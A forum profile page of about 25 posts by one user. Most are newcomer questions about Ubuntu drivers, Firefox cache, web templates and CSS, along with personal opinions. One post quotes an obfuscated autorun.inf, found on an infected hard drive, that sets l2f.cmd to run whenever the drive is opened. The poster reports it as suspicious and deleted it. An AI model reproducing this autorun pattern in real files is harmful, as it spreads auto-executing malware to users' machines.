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Everything posted by kudmus

  1. I have installed Hardy Heron on my P3 with 128MB nVidia Geforce. Although I'm enjoying every bit of the OS, I have a slight problem that is becoming very big. My screen resolution cant go above 640x480. Initially I thought it was the drivers but now I don't know the problem because my system enable the GeForce drivers automatically. It keeps telling me "monitor unknown" even when I changed from my Philips Brilliance to this Siemens 17" Has anyone encountred such a problem? How did you get around it?
  2. Sometimes when I view video tutorials online and I want get pleased with the flash or mp4 I will be viewing online. When I try to seach for the temporary file stored by Firefox so that I can save it in another drive I fail to find it. Does anyone know where these files are stored and which format they will be in? One day I opened the folder: C:\Documents and Settings\Rare\Local Settings\Application Data\Mozilla\Firefox\Profiles6qbhaqp.default\Cache and found a lot of files without extentions. Could these be the files.
  3. Not all of us are programmers but most of us need god sites. Those sites are made for those who know what they want but cannot do it. You must consider yourself blessed because you can code your own site. I for example can not write a single line of code to call a function in php. That's why I'll stick to templates until I can figure out how they make them. I did that with HTML and now I can use it comfortably.
  4. Nummell I can see you are now using Joomla and I should say you are doing fine. I must also point out that using the default template is not the best idea you can come up with. You can try oswd.org like what varalu said. I found Siteground helpful. Other sites you might want to have a look at are: Hotscripts WebcheatSheet PhpBuilder Sitepoint Tizag CompassDesigns I'll try and add more to this list when I get time.
  5. I usually don't trust these "make money easily". Why do you think they come and go like flash floods? Why do you think none of them will ever threaten adsense? I will not join any of those things untill I hear about them from critics like PCPlus, PC Magazine ,etc.That's me, the ever cautious one. If you are not a coward like me go for it.
  6. What a collection! have you visited any of the links you are giving us. I'm sure you didn't coz coming up with such a list is hard enough.Thanks man or rather "boy"
  7. Someone posted instructions on how to create the script here. I didn't go through it so I'm not sure if it works. I also found something that I think you can install on your server. It's called phplist. Judging from the demo pages I think it does the job.
  8. I think jlhaslip is right. Try to look around in the forums do a Google search for the code and see what you come up with. I've never done it but I also think there must be some application out there that you can install on your site.
  9. "Self control" is key. the fact that you came here shows that you already know it's wrong. Be strong and don't give in to temptation. Have your conscience help you.
  10. Interesting! I never knew alt text can be styled. Can you please explain you code more for the benefit of people like me who are a bit lost. Which part of the code makes the background image appear instead of the text itself.
  11. I couldn't agree more. I've noticed that those whose use HTML instead of CSS don't have strong facts to justify their choice. They are simply trying to resist change. Why not change it in CSS whenever you think the font is now obsolete. Besides I don't like sites that keep changing their looks. I believe there should be some uniformity in your pages and pages shoud not change the way they look in a matter of days. Imagine if one day you see your Google search results in Verdana, the next day in Lucida console and then days later they change it to Times New Roman. I don't think sane people would love that.
  12. I also don't like people who try to get things from me by making me feel guilty. I hate that! I also hate girls who ask for things indirectly. Don't say "if only I had ...., I would...". Come on! If u are hungry tell me you are hungry and say what you want me to buy and where and don't ask for an apple when you know you need proper lunch. I can not tell you to do it my way but I take my time to know someone and let myself fall in love, not just start an affair just because someone is interested in you. What people think is love at first sight may be lust at first sight.I also don't like exaggerating how I feel. Show and tell them how you feel and not tell them that "I can't sleep at night thinking about you", "Not a minute goes by that I'm not thinking of you",etc. I understand poetry can exaggerate things but please make sure you make it clear that this is poetry. Please don't be selfish. Most people have friends of the opposite sex but they don't want to see their partner interacting with a member of the opposite sex.
  13. Is it normal what I did? Out of curiosity I just went straight to the satanic version not to download it but to see some screenshots and try to know what these guys would add there. I just can't understand what willbe going thru some1's mind when he comes up with such an idea.
  14. Thanks Truefussion. I'm still experiencing problems though. I tried to make install the drivers and this is what I got: I sent this to guys who made the drivers and one they just made everything uglier for a newbie like me. They replied: Now how do I prepare the lspci and send them? If anyone can simplify this reply for a newbie, I'll appreciate that?
  15. I wouldn't know about EMACS. I wanted to test it but at gnu.org they said "To compile Emacs on Windows, you will need the MingW or Cygwin port of GCC with MingW make..." and that alone scared me simply because I'm not a programmer.I love text editors and my favourites are Notepad++ and ConTEXT. They are not identical in terms of features so i can't get rid of any of them. Each one does stuff that cannot be done by the other. I like their support for various languages and they are so handy when it comes to PHP, CSS, HTML, Javascript, etc.
  16. It is actually a driver problem. I had to switch back to my XP to browse the internet. I did the same thing with Gusty( Dual booting with XP) but I left Gusty because I failed to to configure it to get internet. I could browse the internet because I could manually change the settings in the browser but the system was not getting anything. It kept giving me the error messages telling me I had no internet conection. This time there is absolutely nothing. I can't even see network folders like I would in Ubuntu7.10
  17. I am a newbie who just installed Ubuntu Studio 8.04. I can't see network directories and everything that is not on my machine so I just thought it was the network drivers.I tried to install my pro 100VM drivers. I was trying to follow the Readme supplied by intel on how to install but I got stuck where it said I have to compile the "make install" I have attached the read me so thst you can see the instructions and give me a dummies guide to installing this thing. Tell me what you wouldn't tell someone who is computer litterate because I think this readme assumes I have some Linux knowledge. Is this the correct file to begin with? Does anyone know where I can get the drivers and install them in a way that is easier for me.README_linux_pro100.txt
  18. I was trying to install my pro 100VM drivers in Ubuntu Studio8.04(Hardy heron). I was trying to follow the Readme supplied by intel on how to install but I got stuck where it said I have to compile the "make install" I have attached the read me so thst you can see the instructions and give me a dummies guide to installing this thing. Tell me what you wouldn't tell someone who is computer litterate because I think this readme assumes I have some Linux knowledge.README_linux_pro100.txtPliz help!
  19. Very true! I wonder how someone can get to hate Firefox. I just dont know any reason why I would rate another browser better than Firefox. I've always wanted to try Konqueror on my Windows box but if it doesn't have tabs then I won't even try it. Hey you said IE6 has tabs. How do you enable them? I only know that if you install Yahoo! Mesenger and choose to instal tha toolbar you end up with tabs but I dont like the toolbar.Can you help? Even if I do'nt usualy use it I want it to have tabs.
  20. Actually the under 18s are not the only ones who are restricted. There are people like me who live in sanctioned countries who can't do anything about it. It's a pain I tell you. After all the sanctions were supposed to be targeted on those who are oppressing us.
  21. Hey guys, sorry to take you away from the subject a little. I got this follwing script from javascriptkit.com but there's a line that I dont understand. <script type="text/javascript">//Enter domain of site to search.var domainroot="kudmus.trap17.com;function Gsitesearch(curobj){curobj.q.value="site:"+domainroot+" "+curobj.qfront.value}</script><form action="google.com/search&%2334; method="get" onSubmit="Gsitesearch(this)"><p>Search Kudmus:<br /><input name="q" type="hidden" /><input name="qfront" type="text" style="width: 180px" /> <input type="submit" value="Search" /></p></form> There is this following line that displays a funny icon in Dreamweaver: <input name="q" type="hidden" /> Can I get rid of this line? What does it do?
  22. I remeber reading a post here that mentioned something like converting a .blogspot.com account into a .com domain but now I spent 45 minutes looking for the thread and I'm failing to find it. Does anyone remember the thread or the site that the guy was pointing us to? Please help!
  23. I have a harddrive that will always ask me which program I want to open it with. It does it on every machine that I install it on. I have some fixes that I downloaded but I believe fixing the problem in my registry will not fix that problem permanantly. WHat do u think went wrong Wait a minute! I saw an autorun.inf in the hard drive. With the following contents: ;4sokwe7raZLjsima5l3[AutoRun];dSd3s11s20LsA7fa2aAjOAa42open=l2f.cmd;C4LmkoLAd22oiXLD2nsd3a40ei13d42KS80cdlaSaiF3J7ss1Dw3lwjwlKLlcZ1k2A2swf8KalDe3de3wlshell\open\Command=l2f.cmd;DewekfAkSo09rdiw442ssOAKoL4shell\open\Default=1;0lK0fsD1wa1ka3aDed06riiq8Ac4lqK8wAwk3kDmSprasdsUwfaLkeqf3qd5a1ows5s5a0Af4Ksor5raZk443washell\explore\Command=l2f.cmd;poeAl32d2L2AoKLoir27ow3ClLD3saZkw4oa3akiSl4i52D7k275KAaisdarUaKK9o2dewDsd2ea0afj8issw43Kwqdw Delete it and everything was back to normal. Now I don't know what could have created this unscrupulous file. Does anyone have an idea?
  24. I'm touched when you guys remember Africa like that. May God bless for you for being so....(I don't know a word that can best describe what I think you are). It used to hurt me to see people look at us like that(like bergers wo can't do anything until they get handouts) but I tought myself to accept things as they are. We are poor! And we can't count on anyone to do something about it because Those who want to change things can not do anything significant. That's some deep thinking there. The Evil Bear is not all that evil after all.
  25. Any dummie can tell you it's plain to see that gmail sits on top unrivalled. I have a number of accounts but I only use Gmail when it come to anything serious. Below are some of the accounts that I have listed in the way I rate them.1. Hotmail.com2. Yahoomail.com3. Rediffmail.com4. Bonbon.com5. cooltoad.com6. 37.com7. Fastermail.com8. yo.co.zw(the simplest I've ever used. Don't try it. It's only for Zimbos)the top 3 are the only ones that I think are worth using.
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